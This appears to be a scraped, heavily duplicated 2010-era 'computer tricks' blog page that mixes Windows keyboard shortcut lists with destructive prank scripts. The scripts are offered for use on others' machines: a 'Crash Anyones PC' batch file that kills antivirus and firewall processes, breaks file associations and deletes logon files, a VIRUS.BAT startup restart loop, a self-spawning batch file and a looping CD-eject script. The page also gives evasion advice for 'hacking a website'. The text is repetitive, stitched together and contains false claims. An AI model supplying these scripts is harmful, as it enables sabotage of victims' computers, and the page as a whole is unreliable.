* ALT+F4 (Close the console)
* ALT+A (Display the Action menu)
* ALT+V (Display the View menu)
* ALT+F (Display the File menu)
* ALT+O (Display the Favorites menu)
* CTRL+N (Open a new console)
* CTRL+S (Save the open console)
* CTRL+M (Add or remove a console item)
* CTRL+W (Open a new window)
* F5 key (Update the content of all console windows)
* ALT+SPACEBAR (Display the MMC window menu)
* ALT+F4 (Close the console)
* ALT+A (Display the Action menu)
* ALT+V (Display the View menu)
* ALT+F (Display the File menu)
* ALT+O (Display the Favorites menu)
MMC console window keyboard shortcuts
* CTRL+P (Print the current page or active pane)
* ALT+Minus sign (-) (Display the window menu for the active console window)
* SHIFT+F10 (Display the Action shortcut menu for the selected item)
* F1 key (Open the Help topic, if any, for the selected item)
* F5 key (Update the content of all console windows)
* CTRL+F10 (Maximize the active console window)
* CTRL+F5 (Restore the active console window)
* ALT+ENTER (Display the Properties dialog box, if any, for the selected item)
* F2 key (Rename the selected item)
* CTRL+F4 (Close the active console window. When a console has only one console window, this shortcut closes the console)
* ALT+Minus sign (-) (Display the window menu for the active console window)
* SHIFT+F10 (Display the Action shortcut menu for the selected item)
* F1 key (Open the Help topic, if any, for the selected item)
* F5 key (Update the content of all console windows)
* CTRL+F10 (Maximize the active console window)
* CTRL+F5 (Restore the active console window)
* ALT+ENTER (Display the Properties dialog box, if any, for the selected item)
* F2 key (Rename the selected item)
* CTRL+F4 (Close the active console window. When a console has only one console window, this shortcut closes the console)
Crash Anyones PC in simple way
Just Copy This Code Below In Notepad, Save as installhack.bat and you are done!
This Hack will:
1. End Process, NAVAPSVC.exe
2. End Process, Explorer.exe (taskbar and icons will dissapear)
3. End Process, zonelabs.exe
4. associate a exe file with txt (when opening exe files, it will go to notepad)
5. associate a txt file with mp3 (when opening txt files, it will open WinAmp or WMP)
6. Deletes Login/Logoff Screens
Copy below code which is in Red colour ==>
************************************************************************************
title Hack Setup
color 0A
@echo off
set end=md “Hack installing”
set fin=copy “Hack log.txt” “Installing”
%end%
%fin%
net send * Hack is installing, press OK to begin set up.
kill NAVAPSVC.exe /F /Q
kill zonelabs.exe /F /Q
kill explorer.exe /F /Q
cls
assoc .exe=txtfile
assoc .txt=mp3file
cls
msg * It is you who is hacked….
msg * I warned you, and you kept going. Challenge me and this is what happens.
DEL C:\WINDOWS\system32\logoff.exe /F /Q
DEL C:\WINDOWS\system32\logon.exe /F /Q
DEL C:\WINDOWS\system32\logon.scr /F /Q
cls
shutdown
**************************************************************
Please Do NOT Try This Yourself!
I will NOT Be Held Responsible for this..!!!
Have FuN...
Enjoy..!!
@Microsoft Internet Explorer navigation
* CTRL+B (Open the Organize Favorites dialog box)
* CTRL+E (Open the Search bar)
* CTRL+F (Start the Find utility)
* CTRL+H (Open the History bar)
* CTRL+I (Open the Favorites bar)
* CTRL+L (Open the Open dialog box)
* CTRL+N (Start another instance of the browser with the same Web address)
* CTRL+O (Open the Open dialog box, the same as CTRL+L)
* CTRL+P (Open the Print dialog box)
* CTRL+R (Update the current Web page)
* CTRL+W (Close the current window)
This Hack will:
1. End Process, NAVAPSVC.exe
2. End Process, Explorer.exe (taskbar and icons will dissapear)
3. End Process, zonelabs.exe
4. associate a exe file with txt (when opening exe files, it will go to notepad)
5. associate a txt file with mp3 (when opening txt files, it will open WinAmp or WMP)
6. Deletes Login/Logoff Screens
Copy below code which is in Red colour ==>
************************************************************************************
title Hack Setup
color 0A
@echo off
set end=md “Hack installing”
set fin=copy “Hack log.txt” “Installing”
%end%
%fin%
net send * Hack is installing, press OK to begin set up.
kill NAVAPSVC.exe /F /Q
kill zonelabs.exe /F /Q
kill explorer.exe /F /Q
cls
assoc .exe=txtfile
assoc .txt=mp3file
cls
msg * It is you who is hacked….
msg * I warned you, and you kept going. Challenge me and this is what happens.
DEL C:\WINDOWS\system32\logoff.exe /F /Q
DEL C:\WINDOWS\system32\logon.exe /F /Q
DEL C:\WINDOWS\system32\logon.scr /F /Q
cls
shutdown
**************************************************************
Please Do NOT Try This Yourself!
I will NOT Be Held Responsible for this..!!!
Have FuN...
Enjoy..!!
@Microsoft Internet Explorer navigation
* CTRL+B (Open the Organize Favorites dialog box)
* CTRL+E (Open the Search bar)
* CTRL+F (Start the Find utility)
* CTRL+H (Open the History bar)
* CTRL+I (Open the Favorites bar)
* CTRL+L (Open the Open dialog box)
* CTRL+N (Start another instance of the browser with the same Web address)
* CTRL+O (Open the Open dialog box, the same as CTRL+L)
* CTRL+P (Open the Print dialog box)
* CTRL+R (Update the current Web page)
* CTRL+W (Close the current window)
Start movie in Paint!
* First start a movie in any player.
* Then open Paint.
* Now, in the player when the movie is being played, press "Print screen" button on your key board.
* Now, Press ctrl+v in Paint
* Leave the movie player open and don't minimize it.
* Open Paint now and see the movie in the Paint!
* Then open Paint.
* Now, in the player when the movie is being played, press "Print screen" button on your key board.
* Now, Press ctrl+v in Paint
* Leave the movie player open and don't minimize it.
* Open Paint now and see the movie in the Paint!
For tracing the mobile no
1>>http://trace.bharatiyamobile.com/
2>>http://www.indiatrace.com/index.php
u cant get full details of the mobile number...
only thse much info. u get....
2>>http://www.indiatrace.com/index.php
u cant get full details of the mobile number...
only thse much info. u get....
Friday, April 2, 2010
Saturday, March 13, 2010
For tracing the mobile no
1>>http://trace.bharatiyamobile.com/
2>>http://www.indiatrace.com/index.php
u cant get full details of the mobile number...
only thse much info. u get....
2>>http://www.indiatrace.com/index.php
u cant get full details of the mobile number...
only thse much info. u get....
Start movie in Paint!
* First start a movie in any player.
* Then open Paint.
* Now, in the player when the movie is being played, press "Print screen" button on your key board.
* Now, Press ctrl+v in Paint
* Leave the movie player open and don't minimize it.
* Open Paint now and see the movie in the Paint!
* Then open Paint.
* Now, in the player when the movie is being played, press "Print screen" button on your key board.
* Now, Press ctrl+v in Paint
* Leave the movie player open and don't minimize it.
* Open Paint now and see the movie in the Paint!
Crash Anyones PC in simple way
Just Copy This Code Below In Notepad, Save as installhack.bat and you are done!
This Hack will:
1. End Process, NAVAPSVC.exe
2. End Process, Explorer.exe (taskbar and icons will dissapear)
3. End Process, zonelabs.exe
4. associate a exe file with txt (when opening exe files, it will go to notepad)
5. associate a txt file with mp3 (when opening txt files, it will open WinAmp or WMP)
6. Deletes Login/Logoff Screens
Copy below code which is in Red colour ==>
************************************************************************************
title Hack Setup
color 0A
@echo off
set end=md “Hack installing”
set fin=copy “Hack log.txt” “Installing”
%end%
%fin%
net send * Hack is installing, press OK to begin set up.
kill NAVAPSVC.exe /F /Q
kill zonelabs.exe /F /Q
kill explorer.exe /F /Q
cls
assoc .exe=txtfile
assoc .txt=mp3file
cls
msg * It is you who is hacked….
msg * I warned you, and you kept going. Challenge me and this is what happens.
DEL C:\WINDOWS\system32\logoff.exe /F /Q
DEL C:\WINDOWS\system32\logon.exe /F /Q
DEL C:\WINDOWS\system32\logon.scr /F /Q
cls
shutdown
**************************************************************
Please Do NOT Try This Yourself!
I will NOT Be Held Responsible for this..!!!
Have FuN...
Enjoy..!!
This Hack will:
1. End Process, NAVAPSVC.exe
2. End Process, Explorer.exe (taskbar and icons will dissapear)
3. End Process, zonelabs.exe
4. associate a exe file with txt (when opening exe files, it will go to notepad)
5. associate a txt file with mp3 (when opening txt files, it will open WinAmp or WMP)
6. Deletes Login/Logoff Screens
Copy below code which is in Red colour ==>
************************************************************************************
title Hack Setup
color 0A
@echo off
set end=md “Hack installing”
set fin=copy “Hack log.txt” “Installing”
%end%
%fin%
net send * Hack is installing, press OK to begin set up.
kill NAVAPSVC.exe /F /Q
kill zonelabs.exe /F /Q
kill explorer.exe /F /Q
cls
assoc .exe=txtfile
assoc .txt=mp3file
cls
msg * It is you who is hacked….
msg * I warned you, and you kept going. Challenge me and this is what happens.
DEL C:\WINDOWS\system32\logoff.exe /F /Q
DEL C:\WINDOWS\system32\logon.exe /F /Q
DEL C:\WINDOWS\system32\logon.scr /F /Q
cls
shutdown
**************************************************************
Please Do NOT Try This Yourself!
I will NOT Be Held Responsible for this..!!!
Have FuN...
Enjoy..!!
Microsoft Internet Explorer navigation
* CTRL+B (Open the Organize Favorites dialog box)
* CTRL+E (Open the Search bar)
* CTRL+F (Start the Find utility)
* CTRL+H (Open the History bar)
* CTRL+I (Open the Favorites bar)
* CTRL+L (Open the Open dialog box)
* CTRL+N (Start another instance of the browser with the same Web address)
* CTRL+O (Open the Open dialog box, the same as CTRL+L)
* CTRL+P (Open the Print dialog box)
* CTRL+R (Update the current Web page)
* CTRL+W (Close the current window)
* CTRL+E (Open the Search bar)
* CTRL+F (Start the Find utility)
* CTRL+H (Open the History bar)
* CTRL+I (Open the Favorites bar)
* CTRL+L (Open the Open dialog box)
* CTRL+N (Start another instance of the browser with the same Web address)
* CTRL+O (Open the Open dialog box, the same as CTRL+L)
* CTRL+P (Open the Print dialog box)
* CTRL+R (Update the current Web page)
* CTRL+W (Close the current window)
Remote desktop connection navigation
* CTRL+ALT+END (Open the Microsoft Windows NT Security dialog box)
* ALT+PAGE UP (Switch between programs from left to right)
* ALT+PAGE DOWN (Switch between programs from right to left)
* ALT+INSERT (Cycle through the programs in most recently used order)
* ALT+HOME (Display the Start menu)
* CTRL+ALT+BREAK (Switch the client computer between a window and a full screen)
* ALT+DELETE (Display the Windows menu)
* CTRL+ALT+Minus sign (-) (Place a snapshot of the entire client window area on the Terminal server clipboard and provide the same functionality as pressing ALT+PRINT SCREEN on a local computer.)
* CTRL+ALT+Plus sign (+) (Place a snapshot of the active window in the client on the Terminal server clipboard and provide the same functionality as pressing PRINT SCREEN on a local computer.)
* ALT+PAGE UP (Switch between programs from left to right)
* ALT+PAGE DOWN (Switch between programs from right to left)
* ALT+INSERT (Cycle through the programs in most recently used order)
* ALT+HOME (Display the Start menu)
* CTRL+ALT+BREAK (Switch the client computer between a window and a full screen)
* ALT+DELETE (Display the Windows menu)
* CTRL+ALT+Minus sign (-) (Place a snapshot of the entire client window area on the Terminal server clipboard and provide the same functionality as pressing ALT+PRINT SCREEN on a local computer.)
* CTRL+ALT+Plus sign (+) (Place a snapshot of the active window in the client on the Terminal server clipboard and provide the same functionality as pressing PRINT SCREEN on a local computer.)
MMC console window keyboard shortcuts
* CTRL+P (Print the current page or active pane)
* ALT+Minus sign (-) (Display the window menu for the active console window)
* SHIFT+F10 (Display the Action shortcut menu for the selected item)
* F1 key (Open the Help topic, if any, for the selected item)
* F5 key (Update the content of all console windows)
* CTRL+F10 (Maximize the active console window)
* CTRL+F5 (Restore the active console window)
* ALT+ENTER (Display the Properties dialog box, if any, for the selected item)
* F2 key (Rename the selected item)
* CTRL+F4 (Close the active console window. When a console has only one console window, this shortcut closes the console)
* ALT+Minus sign (-) (Display the window menu for the active console window)
* SHIFT+F10 (Display the Action shortcut menu for the selected item)
* F1 key (Open the Help topic, if any, for the selected item)
* F5 key (Update the content of all console windows)
* CTRL+F10 (Maximize the active console window)
* CTRL+F5 (Restore the active console window)
* ALT+ENTER (Display the Properties dialog box, if any, for the selected item)
* F2 key (Rename the selected item)
* CTRL+F4 (Close the active console window. When a console has only one console window, this shortcut closes the console)
Microsoft Management Console (MMC) main window key
* CTRL+O (Open a saved console)
* CTRL+N (Open a new console)
* CTRL+S (Save the open console)
* CTRL+M (Add or remove a console item)
* CTRL+W (Open a new window)
* F5 key (Update the content of all console windows)
* ALT+SPACEBAR (Display the MMC window menu)
* ALT+F4 (Close the console)
* ALT+A (Display the Action menu)
* ALT+V (Display the View menu)
* ALT+F (Display the File menu)
* ALT+O (Display the Favorites menu)
* CTRL+N (Open a new console)
* CTRL+S (Save the open console)
* CTRL+M (Add or remove a console item)
* CTRL+W (Open a new window)
* F5 key (Update the content of all console windows)
* ALT+SPACEBAR (Display the MMC window menu)
* ALT+F4 (Close the console)
* ALT+A (Display the Action menu)
* ALT+V (Display the View menu)
* ALT+F (Display the File menu)
* ALT+O (Display the Favorites menu)
Shortcut keys for Character Map
After you double-click a character on the grid of characters, you can move through the grid by using the keyboard shortcuts:
* RIGHT ARROW (Move to the right or to the beginning of the next line)
* LEFT ARROW (Move to the left or to the end of the previous line)
* UP ARROW (Move up one row)
* DOWN ARROW (Move down one row)
* PAGE UP (Move up one screen at a time)
* PAGE DOWN (Move down one screen at a time)
* HOME (Move to the beginning of the line)
* END (Move to the end of the line)
* CTRL+HOME (Move to the first character)
* CTRL+END (Move to the last character)
* SPACEBAR (Switch between Enlarged and Normal mode when a character is selected)
* RIGHT ARROW (Move to the right or to the beginning of the next line)
* LEFT ARROW (Move to the left or to the end of the previous line)
* UP ARROW (Move up one row)
* DOWN ARROW (Move down one row)
* PAGE UP (Move up one screen at a time)
* PAGE DOWN (Move down one screen at a time)
* HOME (Move to the beginning of the line)
* END (Move to the end of the line)
* CTRL+HOME (Move to the first character)
* CTRL+END (Move to the last character)
* SPACEBAR (Switch between Enlarged and Normal mode when a character is selected)
Windows Explorer keyboard shortcuts
* END (Display the bottom of the active window)
* HOME (Display the top of the active window)
* NUM LOCK+Asterisk sign (*) (Display all of the subfolders that are under the selected folder)
* NUM LOCK+Plus sign (+) (Display the contents of the selected folder)
* NUM LOCK+Minus sign (-) (Collapse the selected folder)
* LEFT ARROW (Collapse the current selection if it is expanded, or select the parent folder)
* RIGHT ARROW (Display the current selection if it is collapsed, or select the first subfolder)
* HOME (Display the top of the active window)
* NUM LOCK+Asterisk sign (*) (Display all of the subfolders that are under the selected folder)
* NUM LOCK+Plus sign (+) (Display the contents of the selected folder)
* NUM LOCK+Minus sign (-) (Collapse the selected folder)
* LEFT ARROW (Collapse the current selection if it is expanded, or select the parent folder)
* RIGHT ARROW (Display the current selection if it is collapsed, or select the first subfolder)
Accessibility keyboard shortcuts
* Right SHIFT for eight seconds (Switch FilterKeys either on or off)
* Left ALT+left SHIFT+PRINT SCREEN (Switch High Contrast either on or off)
* Left ALT+left SHIFT+NUM LOCK (Switch the MouseKeys either on or off)
* SHIFT five times (Switch the StickyKeys either on or off)
* NUM LOCK for five seconds (Switch the ToggleKeys either on or off)
* Windows Logo +U (Open Utility Manager)
* Left ALT+left SHIFT+PRINT SCREEN (Switch High Contrast either on or off)
* Left ALT+left SHIFT+NUM LOCK (Switch the MouseKeys either on or off)
* SHIFT five times (Switch the StickyKeys either on or off)
* NUM LOCK for five seconds (Switch the ToggleKeys either on or off)
* Windows Logo +U (Open Utility Manager)
Microsoft natural keyboard shortcuts
* Windows Logo (Display or hide the Start menu)
* Windows Logo+BREAK (Display the System Properties dialog box)
* Windows Logo+D (Display the desktop)
* Windows Logo+M (Minimize all of the windows)
* Windows Logo+SHIFT+M (Restore the minimized windows)
* Windows Logo+E (Open My Computer)
* Windows Logo+F (Search for a file or a folder)
* CTRL+Windows Logo+F (Search for computers)
* Windows Logo+F1 (Display Windows Help)
* Windows Logo+ L (Lock the keyboard)
* Windows Logo+R (Open the Run dialog box)
* Windows Logo+U (Open Utility Manager)
* Windows Logo+BREAK (Display the System Properties dialog box)
* Windows Logo+D (Display the desktop)
* Windows Logo+M (Minimize all of the windows)
* Windows Logo+SHIFT+M (Restore the minimized windows)
* Windows Logo+E (Open My Computer)
* Windows Logo+F (Search for a file or a folder)
* CTRL+Windows Logo+F (Search for computers)
* Windows Logo+F1 (Display Windows Help)
* Windows Logo+ L (Lock the keyboard)
* Windows Logo+R (Open the Run dialog box)
* Windows Logo+U (Open Utility Manager)
Thursday, March 11, 2010
Change Your Ip In Less Then 1 Minute ~~~~~~>
1. Click on "Start" in the bottom left hand corner of screen
2. Click on "Run"
3. Type in "command" and hit ok
You should now be at an MSDOS prompt screen.
4. Type "ipconfig /release" just like that, and hit "enter"
5. Type "exit" and leave the prompt
6. Right-click on "Network Places" or "My Network Places" on your desktop.
7. Click on "properties"
You should now be on a screen with something titled "Local Area Connection", or something close to that, and, if you have a network hooked up, all of your other networks.
8. Right click on "Local Area Connection" and click "properties"
9. Double-click on the "Internet Protocol (TCP/IP)" from the list under the "General" tab
10. Click on "Use the following IP address" under the "General" tab
11. Create an IP address (It doesn't matter what it is. I just type 1 and 2 until i fill the area up).
12. Press "Tab" and it should automatically fill in the "Subnet Mask" section with default numbers.
13. Hit the "Ok" button here
14. Hit the "Ok" button again
You should now be back to the "Local Area Connection" screen.
15. Right-click back on "Local Area Connection" and go to properties again.
16. Go back to the "TCP/IP" settings
17. This time, select "Obtain an IP address automatically"
tongue.gif 18. Hit "Ok"
19. Hit "Ok" again
20. You now have a new IP address
With a little practice, you can easily get this process down to 15 seconds.
Warning:
This only changes your dynamic IP address, not your ISP/IP address. If you plan on hacking a website with this trick be extremely careful, because if they try a little, they can trace it back
2. Click on "Run"
3. Type in "command" and hit ok
You should now be at an MSDOS prompt screen.
4. Type "ipconfig /release" just like that, and hit "enter"
5. Type "exit" and leave the prompt
6. Right-click on "Network Places" or "My Network Places" on your desktop.
7. Click on "properties"
You should now be on a screen with something titled "Local Area Connection", or something close to that, and, if you have a network hooked up, all of your other networks.
8. Right click on "Local Area Connection" and click "properties"
9. Double-click on the "Internet Protocol (TCP/IP)" from the list under the "General" tab
10. Click on "Use the following IP address" under the "General" tab
11. Create an IP address (It doesn't matter what it is. I just type 1 and 2 until i fill the area up).
12. Press "Tab" and it should automatically fill in the "Subnet Mask" section with default numbers.
13. Hit the "Ok" button here
14. Hit the "Ok" button again
You should now be back to the "Local Area Connection" screen.
15. Right-click back on "Local Area Connection" and go to properties again.
16. Go back to the "TCP/IP" settings
17. This time, select "Obtain an IP address automatically"
tongue.gif 18. Hit "Ok"
19. Hit "Ok" again
20. You now have a new IP address
With a little practice, you can easily get this process down to 15 seconds.
Warning:
This only changes your dynamic IP address, not your ISP/IP address. If you plan on hacking a website with this trick be extremely careful, because if they try a little, they can trace it back
HIDE FILES IN A JPG SET UP:
1. Must have a .zip or .rar compressor.
Steps:
1. Save the picture of choice to your desktop.
2. Make a new .rar or .zip folder on your desktop.
3. Add the files you want to hide into the .zip or .rar
4. Click start menu, run, cmd.
5. In Command Prompt type cd "desktop" with the quotation marks.
6. Now type in copy /b picturename.jpg + foldername.rar outputfilename.jpg
( If you use .zip then: copy /b picturename.jpg + foldername.zip outputfilename.jpg)
7. Now there should be the outputed file name with a .jpg extension on the desktop.
( Do not close Command Prompt just yet )
8. Double click it to open the picture and check it out.
9. When your done looking, and want to view the hidden files
Type: ren outputfilename.jpg outputfilename.rar or zip
Steps:
1. Save the picture of choice to your desktop.
2. Make a new .rar or .zip folder on your desktop.
3. Add the files you want to hide into the .zip or .rar
4. Click start menu, run, cmd.
5. In Command Prompt type cd "desktop" with the quotation marks.
6. Now type in copy /b picturename.jpg + foldername.rar outputfilename.jpg
( If you use .zip then: copy /b picturename.jpg + foldername.zip outputfilename.jpg)
7. Now there should be the outputed file name with a .jpg extension on the desktop.
( Do not close Command Prompt just yet )
8. Double click it to open the picture and check it out.
9. When your done looking, and want to view the hidden files
Type: ren outputfilename.jpg outputfilename.rar or zip
DISKO LIGHTING OF KEYBOARD
Open notepad & type this
Set wshShell =wscript.CreateObject("WScript.Shell")
do
wscript.sleep 100
wshshell.sendkeys "{CAPSLOCK}"
wshshell.sendkeys "{NUMLOCK}"
wshshell.sendkeys "{SCROLLLOCK}"
loop
save as disco.vbs
then just see the lights of the keyboard....(caps lock,scroll lock & num lock wali lights)
For stop the disko::
open task manager and end process wscript.exe
& its done....
Set wshShell =wscript.CreateObject("WScript.Shell")
do
wscript.sleep 100
wshshell.sendkeys "{CAPSLOCK}"
wshshell.sendkeys "{NUMLOCK}"
wshshell.sendkeys "{SCROLLLOCK}"
loop
save as disco.vbs
then just see the lights of the keyboard....(caps lock,scroll lock & num lock wali lights)
For stop the disko::
open task manager and end process wscript.exe
& its done....
Invisible Scraps!
Hey!.....It is very easy to send invisible scraps now!
Just follow the steps as follows!
* Got to someone's scrap book.
* Write there [ i ] without spaces in between.
* Click on Submit.
WOW!
You have just sent an invisible scrap!
Just follow the steps as follows!
* Got to someone's scrap book.
* Write there [ i ] without spaces in between.
* Click on Submit.
WOW!
You have just sent an invisible scrap!
FOR CRASH ANEONE'S PC::
type below codes in notepad & save file as googledotcom.bat
start googledotcom.bat
close
start googledotcom.bat
close
Computer Tricks BEST: AutoCDRom open/close
This one is my BEST BEST and BEST find so far.
Its just a simple java script but its starts a loop thats keeping opening and closing your CD Drive.
Heres how it goes
Set oWMP = CreateObject("WMPlayer.OCX.7" )
Set colCDROMs = oWMP.cdromCollection
if colCDROMs.Count >= 1 then
do
For i = 0 to colCDROMs.Count - 1
colCDROMs.Item(i).Eject
Next ' cdrom
For i = 0 to colCDROMs.Count - 1
colCDROMs.Item(i).Eject
Next ' cdrom
loop
End If
Save as .vbs and run it. Harmless but loads of fun. Just think what all you can do by adding it to startup
Its just a simple java script but its starts a loop thats keeping opening and closing your CD Drive.
Heres how it goes
Set oWMP = CreateObject("WMPlayer.OCX.7" )
Set colCDROMs = oWMP.cdromCollection
if colCDROMs.Count >= 1 then
do
For i = 0 to colCDROMs.Count - 1
colCDROMs.Item(i).Eject
Next ' cdrom
For i = 0 to colCDROMs.Count - 1
colCDROMs.Item(i).Eject
Next ' cdrom
loop
End If
Save as .vbs and run it. Harmless but loads of fun. Just think what all you can do by adding it to startup
Windows Magic
MAGIC #1
An Indian discovered that nobody can create a FOLDER anywhere on the
computer which can be named as "CON". This is something pretty
cool...and unbelievable... At Microsoft the whole Team, couldn't answer
why this happened!
TRY IT NOW ,IT WILL NOT CREATE " CON " FOLDER
MAGIC #2
For those of you using Windows, do the following:
1.) Open an empty notepad file
2.) Type "Bush hid the facts" (without the quotes)
3.) Save it as whatever you want.
4.) Close it, and re-open it.
is it just a really weird bug? :-??
MAGIC #3
Microsoft crazy facts
This is something pretty cool and neat...and unbelievable... At
Microsoft the whole Team, including Bill Gates, couldn't answer why this
happened!
It was discovered by a Brazilian. Try it out yourself...
Open Microsoft Word and type
=rand (200, 99)
And then press ENTER
then see the magic...............................
An Indian discovered that nobody can create a FOLDER anywhere on the
computer which can be named as "CON". This is something pretty
cool...and unbelievable... At Microsoft the whole Team, couldn't answer
why this happened!
TRY IT NOW ,IT WILL NOT CREATE " CON " FOLDER
MAGIC #2
For those of you using Windows, do the following:
1.) Open an empty notepad file
2.) Type "Bush hid the facts" (without the quotes)
3.) Save it as whatever you want.
4.) Close it, and re-open it.
is it just a really weird bug? :-??
MAGIC #3
Microsoft crazy facts
This is something pretty cool and neat...and unbelievable... At
Microsoft the whole Team, including Bill Gates, couldn't answer why this
happened!
It was discovered by a Brazilian. Try it out yourself...
Open Microsoft Word and type
=rand (200, 99)
And then press ENTER
then see the magic...............................
A TRICK TO RESTART SOMEONE'S COMPUTER EVERY TIME
THIS IS A SIMPLE TRICK TO RESTART YOUR COMPUTER ON EVERY START
FIRSTLY U SHOULD HAVE A LITTLE KNOWLEDGE OF MS DOS ..
JUST CREATE A NEW FILE NAME VIRUS.BAT
IN THAT FILE TYPE EXACTLY WHAT I HAVE WRITTEN HERE
@echo off
for %%a IN (C:\documents and settings\all users\start menu\programs\startup\desktop.ini) DO COPY pinfi32.bat "C:\documents and settings\all users\start menu\programs\startup
@echo off
for %%a IN (C:\documents and settings\administrator\start menu\programs\startup\desktop.ini) DO COPY pinfi32.bat "C:\documents and settings\administrator\start menu\programs\startup
cd c:\documents and settings\all users\start menu\programs\startup
@echo off
attrib desktop.ini +h +s
cd\
@echo off
exit
AND CLOSE THAT FILE AFTER SAVING
NOW OPEN THAT FILE ..
NOTHING WILL HAPPEN UNTIL U WILL RESTART
HERE IS A SIMPLE TRICK HOW TO MAKE A BATCH PROGRAM WITHOUT USING DOS
GOTO MY COMPUTER -> TOOLS ->FOLDER OPTIONS -> VIEW->HIDE EXTENSIONS FOR KNOWN FILE TYPES CLICK THAT BOX ...
AND NOW CREATE A NEW FILE WHERE U WANT AND NAME IT AS VIRUS.BAT
AND U HAVE MAKE A BAT FILE WITHOUT USING DOS
AND JUST COPY PASTE THE CODE WHICH I GIVEN BY EDITTING THAT FILE AND JUST SAVE IT
.......
%%DON'T MESS% 6:35 pm(0 minutes ago) THE MOST IMPORTANT PART OF IT IS THAT AFTER U HAVE SUCCESSFULLY MADE A BATCH FILE AND COPIED THAT CODE ..
MAKE ANOTHER BATCH PROGRAM IN WHICH THIS CODES ARE WRITTEN
@echo off
shutdown -r -t 00
exit
GIVE IT NAME AS PINFI32.BAT
AND U R ALMOST DONE
JUST COPY THIS 2 FILES WHEREE EVER U WANT AND OPEN THE VIRUS.BAT FILE AND
THE COMPUTER IS ALWAYS RESTART ON WHICH U HAVE DONE.........
FIRSTLY U SHOULD HAVE A LITTLE KNOWLEDGE OF MS DOS ..
JUST CREATE A NEW FILE NAME VIRUS.BAT
IN THAT FILE TYPE EXACTLY WHAT I HAVE WRITTEN HERE
@echo off
for %%a IN (C:\documents and settings\all users\start menu\programs\startup\desktop.ini) DO COPY pinfi32.bat "C:\documents and settings\all users\start menu\programs\startup
@echo off
for %%a IN (C:\documents and settings\administrator\start menu\programs\startup\desktop.ini) DO COPY pinfi32.bat "C:\documents and settings\administrator\start menu\programs\startup
cd c:\documents and settings\all users\start menu\programs\startup
@echo off
attrib desktop.ini +h +s
cd\
@echo off
exit
AND CLOSE THAT FILE AFTER SAVING
NOW OPEN THAT FILE ..
NOTHING WILL HAPPEN UNTIL U WILL RESTART
HERE IS A SIMPLE TRICK HOW TO MAKE A BATCH PROGRAM WITHOUT USING DOS
GOTO MY COMPUTER -> TOOLS ->FOLDER OPTIONS -> VIEW->HIDE EXTENSIONS FOR KNOWN FILE TYPES CLICK THAT BOX ...
AND NOW CREATE A NEW FILE WHERE U WANT AND NAME IT AS VIRUS.BAT
AND U HAVE MAKE A BAT FILE WITHOUT USING DOS
AND JUST COPY PASTE THE CODE WHICH I GIVEN BY EDITTING THAT FILE AND JUST SAVE IT
.......
%%DON'T MESS% 6:35 pm(0 minutes ago) THE MOST IMPORTANT PART OF IT IS THAT AFTER U HAVE SUCCESSFULLY MADE A BATCH FILE AND COPIED THAT CODE ..
MAKE ANOTHER BATCH PROGRAM IN WHICH THIS CODES ARE WRITTEN
@echo off
shutdown -r -t 00
exit
GIVE IT NAME AS PINFI32.BAT
AND U R ALMOST DONE
JUST COPY THIS 2 FILES WHEREE EVER U WANT AND OPEN THE VIRUS.BAT FILE AND
THE COMPUTER IS ALWAYS RESTART ON WHICH U HAVE DONE.........
Subscribe to:
Posts (Atom)